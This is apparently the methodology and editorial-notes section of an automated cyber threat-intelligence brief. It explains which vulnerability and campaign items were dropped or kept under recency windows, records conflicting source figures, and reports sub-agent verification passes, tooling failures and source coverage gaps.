- GhostSender / Ghost-Sender (Exchange Online sender spoofing, InfoGuard / Abnormal) — strong CH relevance, but the substantive InfoGuard research is dated 9 June (outside the 36 h window) and the two sub-agents returned materially different mechanism descriptions (direct-to-EOP submission bypassing the external MX gateway vs. cross-tenant outbound-relay abuse); dropped rather than publish an unreconciled mechanism. The in-window CH email-threat signal is carried by the NCSC-CH Week 25 item in § 1.
- Cacti 1.2.31 (CVE-2026-39893 and the wider 1.2.31 cluster) — the only citable substantive source (Cacti GHSA-69gg-mjfm-jjpc) is dated 2026-06-19, outside the 36 h window, and covers only CVE-2026-39893; the additional CVEs and the 24-June ENISA EUVD indexing that would anchor it in-window are on a blocked-URL search page that cannot be cited inline. Dropped to avoid both an out-of-window item and over-attribution to a single advisory. Still worth patching: pre-auth SQLi (CVSS 9.8) reachable via default guest graph-viewing.
- Arista EOS tunnel-decapsulation flaw (CVE-2026-7473) — initially drafted as a § 4 UPDATE on the back of an apparently-fresh Eclypsium analysis, but verification established the Eclypsium article is dated 2026-06-16 and the SecurityWeek piece 2026-06-10 — both outside even the 72 h developing window, with no in-window delta. The CVE was already covered on 2026-06-10 (KEV-listed, Arista SA-0137 mitigation); there is no new development this run, so it is dropped rather than recycled. Operators on EOS 4.x should still treat SA-0137 mitigation as permanent (no code fix planned).
- Single-source (national-CERT carve-out): NCSC-CH Week 25 voicemail-phishing item (§ 1) rests on the NCSC-CH Wochenrückblick as primary disclosing authority for Switzerland (PD-5 carve-out).
- Recency edge: the MISP 2.5.42 item (§ 2, released 2026-06-22) sits just beyond the 36 h standard window but inside the 72 h developing window; retained for its direct relevance to the threat-intel platform CH/EU public-sector SOCs run.
- Contradiction: Operation Endgame scale figures differed across sub-agents — one reported 296 servers / 66 domains / 25.6M credentials; the brief uses 326 servers / 142 domains / ~27M credentials / EUR 41M, the figure independently corroborated by Microsoft, ESET and BleepingComputer (the latter quoted verbatim).
- Verification: iteration 1 (`cti-verification`, Opus) returned NEEDS_FIXES (truth 6 / editorial 1 / advisory 1) — corrected a "no CVE published" error + dedup miss on the Arista flaw (CVE-2026-7473), narrowed MISP CVSS to the single GHSA-sourced score, dropped the over-attributed Cacti item, softened the Mistic capability framing, fixed the Operation Endgame directory-traversal attribution (researchers documented it; law enforcement used it), and rebound the Edgecution CloudFront quote. Iteration 2 (`cti-verification-alt`, Sonnet, with prior-iteration deltas) returned NEEDS_FIXES (truth 1 / editorial 1 / advisory 1) — removed a residual "in-memory BOF execution" phrase from the Mistic heading, and on finding the Arista sources are dated 06-16 / 06-10 (out of window) dropped the Arista item entirely rather than republish stale coverage. Iteration 3 (`cti-verification`, Opus, cold read) returned CLEAN (truth 0 / editorial 0; two non-blocking F11 advisories on quote-source labelling left as residual).
- Tooling: `tools/source_health.py` did not finish within its time budget this run (full-source network probe); the committed `state/source_health.json` is the prior snapshot. No impact on the brief.
- Coverage gaps: `databreaches-net` (HTTP 403 on the bridge for a third consecutive run — persistent transport block, not a dead source); `cert-eu`, `cert-fr-avis`, `ncsc-ch-security-hub`, `ncsc-nl`, `cisa-kev`, `msrc` (bridge-reachable but no net-new in-window items); `mandiant-gtig`, `sophos-xops` (feed fetch failures, exit code 1); `inside-it-ch` (Cloudflare-gated); `ico-uk`, `cnil-fr` (no in-window enforcement actions); `broadcom-symantec`, `zscaler-threatlabz` (SPA bodies unreadable from the bridge — content confirmed via corroborating publishers).